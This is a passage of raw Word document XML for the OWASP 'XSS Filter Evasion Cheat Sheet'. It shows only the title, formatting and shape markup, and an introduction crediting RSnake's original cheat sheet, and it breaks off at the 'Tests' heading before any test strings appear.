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7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="KonuBal"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Cheat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Lt"/>
          <w:sz w:val="37"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="233" w:line="328" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="190"/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629440" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1997075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>483870</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1543050" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1413" name="Freeform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43050" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 5554 3145"/>
                            <a:gd name="T1" fmla="*/ T0 w 2430"/>
                            <a:gd name="T2" fmla="+- 0 944 762"/>
                            <a:gd name="T3" fmla="*/ 944 h 183"/>
                            <a:gd name="T4" fmla="+- 0 3166 3145"/>
                            <a:gd name="T5" fmla="*/ T4 w 2430"/>
                            <a:gd name="T6" fmla="+- 0 944 762"/>
                            <a:gd name="T7" fmla="*/ 944 h 183"/>
                            <a:gd name="T8" fmla="+- 0 3163 3145"/>
                            <a:gd name="T9" fmla="*/ T8 w 2430"/>
                            <a:gd name="T10" fmla="+- 0 943 762"/>
                            <a:gd name="T11" fmla="*/ 943 h 183"/>
                            <a:gd name="T12" fmla="+- 0 3145 3145"/>
                            <a:gd name="T13" fmla="*/ T12 w 2430"/>
                            <a:gd name="T14" fmla="+- 0 923 762"/>
                            <a:gd name="T15" fmla="*/ 923 h 183"/>
                            <a:gd name="T16" fmla="+- 0 3145 3145"/>
                            <a:gd name="T17" fmla="*/ T16 w 2430"/>
                            <a:gd name="T18" fmla="+- 0 920 762"/>
                            <a:gd name="T19" fmla="*/ 920 h 183"/>
                            <a:gd name="T20" fmla="+- 0 3145 3145"/>
                            <a:gd name="T21" fmla="*/ T20 w 2430"/>
                            <a:gd name="T22" fmla="+- 0 783 762"/>
                            <a:gd name="T23" fmla="*/ 783 h 183"/>
                            <a:gd name="T24" fmla="+- 0 3166 3145"/>
                            <a:gd name="T25" fmla="*/ T24 w 2430"/>
                            <a:gd name="T26" fmla="+- 0 762 762"/>
                            <a:gd name="T27" fmla="*/ 762 h 183"/>
                            <a:gd name="T28" fmla="+- 0 5554 3145"/>
                            <a:gd name="T29" fmla="*/ T28 w 2430"/>
                            <a:gd name="T30" fmla="+- 0 762 762"/>
                            <a:gd name="T31" fmla="*/ 762 h 183"/>
                            <a:gd name="T32" fmla="+- 0 5575 3145"/>
                            <a:gd name="T33" fmla="*/ T32 w 2430"/>
                            <a:gd name="T34" fmla="+- 0 783 762"/>
                            <a:gd name="T35" fmla="*/ 783 h 183"/>
                            <a:gd name="T36" fmla="+- 0 5575 3145"/>
                            <a:gd name="T37" fmla="*/ T36 w 2430"/>
                            <a:gd name="T38" fmla="+- 0 923 762"/>
                            <a:gd name="T39" fmla="*/ 923 h 183"/>
                            <a:gd name="T40" fmla="+- 0 5557 3145"/>
                            <a:gd name="T41" fmla="*/ T40 w 2430"/>
                            <a:gd name="T42" fmla="+- 0 943 762"/>
                            <a:gd name="T43" fmla="*/ 943 h 183"/>
                            <a:gd name="T44" fmla="+- 0 5554 3145"/>
                            <a:gd name="T45" fmla="*/ T44 w 2430"/>
                            <a:gd name="T46" fmla="+- 0 944 762"/>
                            <a:gd name="T47" fmla="*/ 944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430" h="183">
                              <a:moveTo>
                                <a:pt x="2409" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="181"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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409" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2430" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2430" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2412" y="181"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2409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9490E" id="Freeform 1414" o:spid="_x0000_s1026" style="position:absolute;margin-left:157.25pt;margin-top:38.1pt;width:121.5pt;height:9.15pt;z-index:-176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3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" path="m2409,182l21,182r-3,-1l,161r,-3l,21,21,,2409,r21,21l2430,161r-18,20l2409,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1529715,599440;13335,599440;11430,598805;0,586105;0,584200;0,497205;13335,483870;1529715,483870;1543050,497205;1543050,586105;1531620,598805;1529715,599440" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>article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focused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providing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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professionals</w:t>
      </w:r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guide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assist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Cross</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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Scripting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>testing.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initial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>contents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article</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>donated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OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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RSnake,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his</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>seminal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Cheat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>Sheet,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>at:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Lucida Console"/>
            <w:color w:val="36454E"/>
            <w:w w:val="95"/>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t>http://ha.ckers.org/xss.html</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Lucida Console"/>
            <w:color w:val="36454E"/>
            <w:spacing w:val="-36"/>
            <w:w w:val="95"/>
            <w:sz w:val="15"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink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That</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>now</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>redirects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95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its</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>home</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>here,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>we</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="19"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>plan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="18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hyperlink r:id="rId6">
        <w:r>
          <w:t>maintain</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="9"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>and</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="10"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>enhance</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="9"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>it.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="10"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>The</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="10"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>very</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="9"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>first</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="10"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>OWASP</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="9"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>Prevention</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="10"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>Cheat</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="10"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>Sheet,</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="9"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>the</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="10"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Cross</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="10"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Site</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="9"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Scripting</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="10"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Prevention</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="9"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Cheat</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Sheet</w:t>
        </w:r>
        <w:r>
          <w:t>,</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>was</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>inspired</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>by</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>RSnake's</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="6"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>XSS</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>Cheat</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>Sheet,</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>so</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>we</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="6"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>can</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>thank</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>RSnake</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>for</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>our</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="6"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>inspiration.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>We</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>wanted</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>to</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="5"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>crea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>te</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>short,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>guidelines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developers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>follow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prevent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>XSS,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rather</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>than</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>simply</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>telling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>developers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build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>apps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:t>that</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>could</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>protect</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>against</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>all</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>the</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>fancy</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>tricks</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>specified</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>in</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>rather</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="9"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>complex</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>attack</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>cheat</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>sheet,</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>and</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>so</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>the</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>OWASP</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="8"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Cheat</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t>Sheet</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
            <w:spacing w:val="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="4050B4"/>
          </w:rPr>
          <w:t xml:space="preserve">Series </w:t>
        </w:r>
        <w:r>
          <w:t>was</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:spacing w:val="1"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r>
          <w:t>born.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk1"/>
      </w:pPr>
      <w:r>
        <w:t>Tests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="220" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pPr>
